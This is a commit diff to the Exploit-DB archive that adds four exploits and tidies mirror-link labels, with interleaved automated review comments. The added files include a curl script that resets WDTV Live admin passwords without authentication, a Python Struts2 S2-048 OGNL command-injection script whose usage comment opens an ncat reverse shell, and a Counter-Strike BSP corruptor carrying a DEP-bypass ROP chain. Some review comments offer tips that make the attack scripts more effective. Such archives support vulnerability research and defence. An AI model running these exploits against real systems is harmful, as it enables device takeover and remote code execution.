DB: 2017-07-15

4 new exploits

Counter Strike: Condition Zero - '.BSP' Map File Code Execution
Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)
WDTV Live SMP 2.03.20 - Remote Password Reset
Offensive Security 2017-07-15 05:01:21 +00:00
parent 2f83b6c1be
commit 635e0e935f
51 changed files with 784 additions and 54 deletions

View file

@ -9132,6 +9132,7 @@ id,file,description,date,author,platform,type,port
42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15693,6 +15694,7 @@ id,file,description,date,author,platform,type,port
42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
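Review bot: not part of the added 42327 line, but the neighbouring context entry for 42315 reads `Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)` with a doubled "Windows"; worth fixing in the same CSV touch-up. The added Firefox 50.0.1 entry itself matches the commit message and the `platforms/windows/remote/42327.html` path.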
@ -38134,3 +38136,5 @@ id,file,description,date,author,platform,type,port
42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0
42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0
42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
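Review bot: the added 42324 description carries no identifier for the Struts bug, while the new `platforms/multiple/webapps/42324.py` identifies it as `CVE-2017-9791` / `S2-048`; other descriptions in this file embed the advisory id in parentheses (the 42315 context line ends with `(MS17-010)`), so consider `Apache Struts 2.3.x Showcase - Remote Code Execution (PoC) (S2-048)` or similar so the CSV stays searchable by advisory id.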


View file

@ -1,6 +1,6 @@
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
http://zenthought.org/content/file/android-root-2009-08-16-source
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
# milw0rm.com [2009-08-18]
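Review bot: the rewritten first link drops its `orig:` label and now stands as a bare `http://zenthought.org/content/file/android-root-2009-08-16-source`, so the reader no longer sees which link is the upstream source and which is the mirror. Keep a label on that line, e.g. `Source: http://zenthought.org/content/file/android-root-2009-08-16-source`, matching the `Source:` lines that other files touched by this commit already use (the 37168 and 35661 hunks).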

View file

@ -3,6 +3,9 @@ This exploit was leaked on the Full Disclosure mailing list:
http://seclists.org/fulldisclosure/2012/Jun/404
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
BSD telnetd Remote Root Exploit *ZERODAY*
By Kingcope
Year 2011
@ -48,6 +51,3 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
02:41:51 UTC 2011
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip

View file

@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
Root-Node
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse

View file

@ -0,0 +1,63 @@
#######################################################
## WDTV Live SMP Remote Password Reset Vulnerability ##
#######################################################
Date: Jul 14 2017
Author: sw1tch
Demo: https://www.sw1tch.net/2017/07/12/wdtv-live-smb-exploit/
Description: A simple remotely exploitable web application vulnerability
for the WDTV Live Streaming Media Player and possibly other WDTV systems.
-INTRO-
The WDTV Live SMP is a is a consumer device produced by Western Digital
that plays videos, images, and music from USB drives. It can play
high-definition video through an HDMI port, and standard video through
composite video cables. It can play most common video and audio formats. As
of August 2016, the WDTV appears to be discontinued.
The latest firmware version appears to be 2.03.20.
-VULNERABILITY-
The WDTV Live SMP runs an embedded webserver, allowing authenticated users
to upload themes, manage device settings, access a virtual remote and other
tasks. To authenticate, a user needs to provide the correct password (no
username).
An unauthenticated attacker can update the password via a constructed GET
request, subsequently taking control of many functions of the device.
Vulnerable versions include at least firmware 2.03.20, and likely many more
older versions.
-POC-
#!/bin/bash
echo
echo "WDTV Live SMP Admin Password Reset Exploit"
echo "Apparently sw1tch found this guff in 2017"
echo
if [ $# != 2 ]; then
echo "Usage: `basename $0` <target IP/host> <new password>"
echo
exit $ERR_ARG
fi
# Vars...
target=$1
password=$2
echo -n "[*] Slamming your chosen password at $target now..."
curl "http://$target/DB/modfiy_pw.php" -d "password=$password"
echo "done!"
echo "[*] Try logging in to http://$target/ using $password"
echo
exit 0
-FIX-
None available. Device appears to be EOL so unlikely to be remediated.
--------------------------------------------------------------------------------------------------------------------------------
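Review bot: `exit $ERR_ARG` in the argument check references a variable that is never set, so the usage path exits with the status of the preceding `echo`, i.e. 0; use `exit 1`. Two further points in the same file: the -VULNERABILITY- text says the password is changed via a "constructed GET request" while the PoC sends a POST (`curl "http://$target/DB/modfiy_pw.php" -d "password=$password"`), so one of the two should be corrected, and the -INTRO- opens with a doubled "is a is a". The curl call also prints "done!" whatever the device answers; `curl -sf ... || echo "request failed"` (or adding `-w "%{http_code}"`) would tell the operator whether the reset actually went through before they try to log in.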

View file

@ -1,5 +1,5 @@
/*
EDB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
*/
--------------------------------------------------- decr.c ---------------------------------------------------

View file

@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz

View file

@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)

View file

@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
...
$ strings strings-bfd-badptr2

View file

@ -9,6 +9,6 @@
# CVE : N/A
Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html

View file

@ -125,5 +125,5 @@ Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
E-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

View file

@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
*/
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
# milw0rm.com [2009-08-14]

View file

@ -4,6 +4,6 @@
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
# milw0rm.com [2009-08-14]

View file

@ -8,7 +8,7 @@
# CVE : No CVE, no patch just 0Day
# State : Critical
# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------

View file

@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
Avaya Intuity AUDIX LX 1.0
Avaya Intuity AUDIX
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)

View file

@ -1,6 +1,6 @@
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
Author: RoMaNSoFt <roman@rs-labs.com>
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
# milw0rm.com [2007-11-02]

View file

@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
VMWare ESX Server 3.5 ESX350-200910401
VMWare ACE 2.5.3 Build 185404
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)

View file

@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
Ghostscript Ghostscript 8.54
Ghostscript Ghostscript 8.15
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)

View file

@ -0,0 +1,51 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Just a demo for CVE-2017-9791
import requests
def exploit(url, cmd):
print("[+] command: %s" % cmd)
payload = "%{"
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
payload += "}"
data = {
"name": payload,
"age": 20,
"__checkbox_bustedBefore": "true",
"description": 1
}
headers = {
'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
}
requests.post(url, data=data, headers=headers)
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("python %s <url> <cmd>" % sys.argv[0])
sys.exit(0)
print('[*] exploit Apache Struts2 S2-048')
url = sys.argv[1]
cmd = sys.argv[2]
exploit(url, cmd)
# $ ncat -v -l -p 4444 &
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
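Review bot: `requests.post(url, data=data, headers=headers)` discards the response, so the script gives no indication whether the target answered at all or with what status; assign the result and print `r.status_code` (and pass a `timeout=`) so a filtered or failed request is visible instead of being silently reported as sent. The `Referer` is hardcoded to `http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster` while the target comes from `sys.argv[1]`; either derive it from `url` or drop it, since as written it only matches the local test setup in the usage comment. On a usage error the script should `sys.exit(1)`, not `sys.exit(0)`.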

View file

@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on.
---
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz

View file

@ -27,5 +27,5 @@ Test Environment:
====================================================================
Download the following file for more instructions and exploits:
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
====================================================================

View file

@ -22,5 +22,5 @@ Cheers!
# - A valid account as at least a user
# - The target to have outgoing internet connectivity
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz

View file

@ -2,5 +2,5 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar
This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar

View file

@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails
An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)

View file

@ -19,7 +19,7 @@ DoS("DoS");
-------------------------
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
Regards

View file

@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable.
Proof of concept included.
http://www21.zippyshare.com/v/83302158/file.html
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar

View file

@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8:
Proof of concept included.
http://www42.zippyshare.com/v/23669551/file.html
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf

View file

@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable.
################################################################################
Proof of concept included.
http://www21.zippyshare.com/v/83302158/file.html
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip

View file

@ -65,6 +65,6 @@ User mode DEP access violations are exploitable.
################################################################################
Proof of concept included.
Exploit-DB mirror: http://www39.zippyshare.com/v/91522221/file.html
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
http://www39.zippyshare.com/v/91522221/file.html
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
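Review bot: the replaced line `Exploit-DB mirror: http://www39.zippyshare.com/v/91522221/file.html` wrongly labelled a third-party host as an Exploit-DB mirror, and the new version corrects that, but the zippyshare URL is now left unlabelled. Give it a `Source:` label as the 20861 hunk does (`Source: http://packetstormsecurity.org/files/115908/sysret.rar`) so the distinction between upstream source and mirror stays explicit.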

View file

@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
176efdb4 000003e8
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs

View file

@ -1,4 +1,4 @@
## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
#!/usr/bin/perl -w
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
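Review bot: the relabelled mirror comment still sits on line 1, above `#!/usr/bin/perl -w`, so the shebang is not the first line and the script cannot be executed directly through it; it only runs when invoked explicitly with `perl`. The ordering pre-dates this commit, but since this hunk rewrites the offending line anyway, move the mirror comment below the shebang.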

View file

@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process.
4 . the otherside's yahoo! messenger will be crashed.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
# milw0rm.com [2007-08-29]

View file

@ -16,5 +16,5 @@
# also check here for The Persian docs of this methods and more :
http://www.0days.ir/article/
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)

View file

@ -149,4 +149,4 @@ stores in stack :D
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)

View file

@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/
@w3bd3vil and @abh1sek
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
=================================================================

View file

@ -32,4 +32,4 @@ Trendmicro, CDC
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip

View file

@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt
2 Select all the content in the editor
3 Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z

View file

@ -1,5 +1,5 @@
## Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
## EDB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
# Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
Platform: Windows 8.1 Update 32/64 bit (No other OS tested)

View file

@ -25,5 +25,5 @@ FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt

View file

@ -25,5 +25,5 @@ M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt

View file

@ -12,10 +12,10 @@ R136a1 / hfiref0x
## Compiled EXE:
### x86
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe
+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
+ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
### x64
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
+ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
Source Code:
https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip

View file

@ -14,4 +14,4 @@ http://theori.io/research/cve-2016-0189
3. Browse with a victim IE to `vbscript_bypass_pm.html`.
4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.)
EDB-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip

platforms/windows/local/42325.py Executable file
View file

@ -0,0 +1,237 @@
#!/usr/bin/env python
# Counter Strike: Condition Zero BSP map exploit
# By @Digital_Cold Jun 11, 2017
#
# E-DB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42325.zip (bsp-exploit-source.zip)
#
from binascii import hexlify, unhexlify
from struct import pack, unpack
import math
import mmap
import logging
fmt = "[+] %(message)s"
logging.basicConfig(level=logging.INFO, format=fmt)
l = logging.getLogger("exploit")
# Specific to the file
INDEX_BUFFER_OFF = 0x92ee0 # ARRAY[int]
VERTEX_BUFFER_INDEXES_OFF = 0xA9174 # ARRAY[unsigned short]
VERTEX_DATA_OFF = 0x37f7c # ARRAY[VEC3], VEC3[float, float, float]
NUM_EDGES_OFF = 0x70f94 # The length that was fuzzed to cause the crash
# No longer used as could not find a gadget to 'pop, pop, pop esp, ret'
# SEH_OVERWRITE_OFF = 0x4126C
# Initial offset into the index buffer where the function to exploit resides
INITIAL_OFFSET = 0xb130 # this is multiplied by 4 for data type size already
# INDEX_BUFFER
# 0: 20
# 1: 10
# 2: 2 --> Vertex Buffer Indexes
# VERTEX BUFFER INDEXES
# 0: 1
# 1: 2
# 2: 4 --> Vertex Data
# VERTEX DATA
# 0: 1.23, 23423.0, 3453.3
# 1: 1.23, -9.0, 3453.3
# 2: 1.0, 1.0, 1.0
# 3: 1.0, 1.0, 1.0
# 4: 0.0, 1.0, 0.0
# Example:
# a = INDEX_BUFFER[2] ; a = 2
# b = VERTEX_BUFFER[a] ; b = 4
# vec = VERTEX_DATA[b] ; vec = 0.0, 1.0, 0.0
def dw(x):
return pack("I", x)
def main():
target_file = "eip-minimized.bsp"
output_file = "exploit-gen.bsp"
print "GoldSource .BSP file corruptor"
print " by @Digital_Cold"
print
l.info("Corrupting target file %s" % target_file)
# Read in and memory map target file
fp = open(target_file, 'rb')
mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)
fp.close()
VEC3_COUNT = 63
# then come Saved EBP and return address
start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET
second_idx = VERTEX_BUFFER_INDEXES_OFF
vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults
l.info("Writing to index buffer offset %08x...", start_idx)
l.info("Vertex buffer indexes start %08x", second_idx)
l.info("Vertex data at %08x", vertex_data_start)
data_buffer = []
for i in range(VEC3_COUNT):
for j in range(3):
data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory
data_buffer.append("\x00\x00\x00\x00") # dont care
data_buffer.append("\x00\x00\x00\x00") # unk1
data_buffer.append("\x00\x00\x00\x00") # unk2
data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call)
data_buffer.append("\x00\x00\x00\x00") # EBP
data_buffer.append(dw(0x01407316)) # Saved Ret --> POP EBP; RET [hl.exe]
# XXX: bug in mona. This is a ptr to VirtualProtectEx!!
# 0x387e01ec, # ptr to &VirtualProtect() [IAT steamclient.dll]
"""
Register setup for VirtualAlloc() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
"""
# START ROP CHAIN
# DEP disable ROP chain
# rop chain generated with mona.py - www.corelan.be
#
# useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio
rop_gadgets = [
#0x3808A308, # INT3 # RETN [steamclient.dll]
0x38420ade, # POP EDX # RETN [steamclient.dll]
0x387e01e8, # ptr to &VirtualAlloc() [IAT steamclient.dll]
